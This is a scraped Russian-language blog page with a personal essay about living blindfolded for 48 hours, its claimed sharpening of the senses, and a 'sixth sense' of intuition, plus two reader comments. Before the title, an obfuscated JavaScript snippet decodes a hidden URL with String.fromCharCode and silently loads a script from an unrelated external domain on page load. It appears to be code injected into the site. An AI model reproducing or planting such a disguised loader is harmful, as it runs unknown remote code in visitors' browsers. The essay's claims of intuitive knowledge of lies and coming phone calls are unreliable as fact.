var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);} Два дня жизни в темноте | Ivan Zalesskiy

Этот эксперимент я проводил с целью получения опыта восприятия реальности без помощи зрения, используя остальные органы чувств, для развития своей интуиции.

И так в один прекрасный выходной день, я плотно завязал себе глаза, оставшись один на один со своими чувствами, на 48 часов в полной темноте.

Первое ощущение – паника, хотя нет второе, сначала весело, каждый из нас закрывал глаза и пытался, что-то нащупать, но когда понимаешь что не через пять минут, не через полчаса, ты все равно не начнешь видеть, вот тут приходит - паника тихая, безмолвная, толкаемая страхом, сидящим, где, то очень глубоко. Мозг начинает судорожно соображать – «Что дальше? Как выжить в полной темноте?»

Так как зрительное восприятие у нас занимает около 80 % всех ощущений, то я столкнулся с задачей: - как обходится без этого главного чувства восприятия мира? Таким образом, вроде бы бессмысленная, темная реальность, начинает, наполняется новым смыслом… изучением себя. Я начал прислушиваться, принюхиваться, все трогать и осознавать, выстраивая новую реальность вокруг себя. Старые знакомые вещи, привычные запахи, звуки, стали иными не такими как были раньше. В это время сознание, воспроизводило из воспоминаний картинки тех предметов, с которыми я имел дело. Но это касалось только тех вещей, с которыми я раньше уже сталкивался. А если в руки попадалось что- то необычное, новое, то наступал ступор, я пытался догадаться что это за предмет. Так вот, догадаться получалось не всегда. И передвижения в пространстве стали совсем другими.
Даже, элементарный поход в туалет превращается в проблему, каждый шаг начинаешь вымерять, поджидая опасности от углов и приоткрытых дверей. Оказывается, планировка привычной для меня квартиры, в зрительных кв. метрах, существенно отличается от «щюпаметров». Не знаю, поймете меня или нет, но на ощупь стены стали длиннее, проходы уже, унитаз ниже.

А употребление пищи превратилось невероятный обряд, начинающийся с выбора продуктов, не по их красоте, а с помощью обоняния и тактильного восприятия. И тогда эти продукты превращаются в наслаждение, из букета запахов, вкусов, ощущений в ротовой полости и послевкусия. Хотя прием жидкой пищи оказался куда сложнее, чем раньше, да и с вилки есть стало тоже совсем неудобно, так как через раз я облизывал пустую вилку. Или когда на тарелке оставалось мало еды приходилось помогать себе другой рукой что совсем не эстетично, но меня это в тот момент мало волновало.

Точно также я перестал беспокоиться, о том причесан я или нет, капнул ли я супом на футболку? Да и вообще как я выгляжу со стороны, ведь я этого не вижу.

В общем, кардинально меняются приоритеты, мозг начинает работать по-другому. И самое главное изменяется смысл существования, обыденные дела становятся ненужными из-за невозможности их выполнения без помощи глаз. Больше не нужно не куда бежать, не нужно просиживать, часами в интернете и телевизор совсем не интересен. Не кому не позвонить по сотовому. Не почитать любимую книгу. А мысль о походе на улицу превращается в кошмар, ведь там столько нового, неопознанного на ощупь.

И так, первые часы без зрения проводишь в состоянии адаптации к новой реальности, мир стал другим, каким я раньше его не знал и время начинает течь по-другому. И поначалу все шло, не плохо, я начал привыкать и даже увлекся изучением внешних факторов мира через открытие в себе остальных органов восприятия, на которые раньше я почти не обращал внимания.  
Со школьной скамьи мы знаем пять органов чувств человека: зрение (которое мы отключили), слух, обоняние, осязание и вкус, сейчас современные ученые рассказывают нам о ещё четырех чувствах восприятия: Ноцицепция — это восприятие боли кожей, суставами и другими органами тела.Термоцепция —  это чувство тепла (или его отсутствия) на нашей коже. Проприоцепция — или «осознание тела». А именно понимание того, где находятся части нашего тела, даже когда мы не видим их. Эквибриоцепция — так называемый вестибулярный аппарат, отвечающий за чувство равновесия, которое определяется жидкостью в полости внутреннего уха. Это чувство определяет наше положение в пространстве.

По мнению ученых, органов чувств у человека как минимум девять, но есть что - то еще… что - то другое? (Об этом чуть позже).
В процессе этого эксперимента я действительно ощутил расширение границ восприятия этих чувств, их усиление, если можно так сказать. Притактильном контакте с предметами, моё внимание стало улавливать их отличительные, неповторимыми черты. Поверхности привычных ранее вещей вдруг стали шершавые или гладкие, теплые или холодные, выпуклые или с углублениями, но что важно все разные даже у одинаковых предметов. Например - я стал отличать казалось бы, одинаковые вилки из оного набора. Изменение слухового восприятия тоже поражает, начинаешь не только лучше и четче слышать, но даже примерно определять расстояние до предмета, издающего звук. Вкусовые ощущения совсем не такие как раньше, в хлебе смакуешь каждую крошку, начинаешь ощущать весь его аромат, вода отличается жесткостью или мягкостью, а в шоколаде начинаешь чувствовать сою и горечь какао. «О боже, как этого можно было не замечать раньше»! Даже вестибулярный аппарат,начинает работать по-другому. Моя походка изменилась, стала более осторожная и неспешная, неуверенная, куда здесь спешить, если каждую секунду ожидаешь столкновения. А удерживать равновесие, стоя на одной ноге, оказалось совсем не просто. Таким образом, весь мой организм стал перестраиваться и дополнять недостаток получаемой информации через остальные органы чувств, в какой-то степени компенсируя отсутствие зрения, поэтому и происходит увеличение их чувствительности.

И так от информации, получаемой по новому, окружающий мир меняется, мозг продолжает складывать пазлы этой картины из зрительных воспоминаний, но к ним присоединяются новые ощущения, полученные от остальных органов чувств. Мозг, освобожденный от обработки зрительной информации, начинает работать четче и продуктивнее. Я стал лучше понимать себя, свои внутренние ощущения, желания, волнения, они стали как бы ближе ко мне.

Я понял, что моя жизнь без зрения не стала хуже, она стала другой, тоже по-своему интересной и познавательной.

Но главная задача эксперимента была не в этом,  мне нужно было развить еще одно отдельное чувство восприятия, то, что не описано в медицине, о нем не принято говорить в научных кругах, в народе его принято называть «шестым чувством», экстрасенсорным чувством или интуицией. подчеркиваю, что речь идет о его развитии, так как и до этого у меня не было сомнений в его существовании.
Став более чувствительным, внимательно прислушиваясь к себе, я вдруг стал отличать знания от мыслей. В определенных ситуациях, это знание приходило ко мне. Не ощущение, не понимание, а именно знание, четкое и понятное, ясное как день, без единого сомнения. Я знал - когда человек врет (хотя я не вижу мимики на его лице). Что мне при ходьбе нужно повернуть именно здесь, чтоб не удариться об препятствие, кто сейчас позвонит или какой сейчас час и какие-то другие мелочи, которые мне были нужны.

Какое чувство может давать такие знания?

И сейчас после завершения эксперимента с уверенностью утверждаю что «интуиция» есть у каждого живого существа, но вот не каждый человек к ней прислушивается, а тем более знает как ее использовать. Да это удивительно, это чувство не привязано к физическому телу в отличие от остальных вышеизложенных чувств, то есть не нужно, что-то делать физически, чтоб его «услышать» - понять. Оно более яркое, более сильное, чувство по отношению к остальным девяти, и может заменить любое из физических чувств восприятия, но в сочетании с ними, в их совместной работе это дает невероятный эффект:- понимания и ощущения внутренней среды своего существа, и улучшает взаимосвязь с остальным миром. Причем это понимание, может быть, совсем не логично, и мозг поначалу впадает в ступор, пытаясь логически преобразовать те процессы, которые я начинал осознавать интуитивно. Вот здесь и кроется подвох того, почему я так плохо «слышал» интуицию, ее перекрывала логика. Да, та самаялогика - «царица наук» которую я годами развивал, и добился не малых успехов, но которая, к сожалению, уводит нас в некуда, которая не дает ответов на многие вопросы. Нет, это не значит, что нужно выкинуть логику на помойку, перестать ей пользоваться, ведь логика это работа ума - то есть физической части нашего существа, а интуиция это духовный инструмент. А это значит что, научившись использовать оба инструмента в правильном сочетании, перед человеком открывается невероятные возможности познания всей глубины мироздания, понимание взаимосвязи всего живого на земле и что самое главное понимание той самой божественной сути, о которой так много говорят и пишут. 

И в завершении, дорогие друзья, чтобы я не описывал, поистине вы сможете это понять, пройдя свой путь, поэтому не бойтесь экспериментировать, пробовать новое и познавать себя.

Поделится в соц сетях:
Система Orphus

Комментарии

Женя (не проверено)
Аватар пользователя Женя
20.07.2016
Благодарю!!! Интересный материал и, как всегда на "Психологии Нового Времени" с пользой, - очень своевременно!!! Спасибо!!!
Антон (не проверено)
Аватар пользователя Антон
24.08.2016
Класс!!! Нужно будет попробовать такую практику

Добавить комментарий

Подобные материалы

Главным и первичным различием у Мужчин и Женщин является разная энергетическая структура. Именно это формируют их...

Все стремиться к стабильности в жизни, желая найти её в чём-то определённом. В отношениях, в богатстве, в счастье, в...

Большинство людей понятия не имеют, что такое ресурсы человеческого сознания, они живут по принципу "стимул -...

ПОДПИШИТЕСЬ НА НАШУ РАССЫЛКУ

ХОТИТЕ ПОЛУЧАТЬ НОВОСТИ ИЛИ ИНФОРМАЦИЮ О БЛИЖАЙЩИХ СЕМИНАРАХ?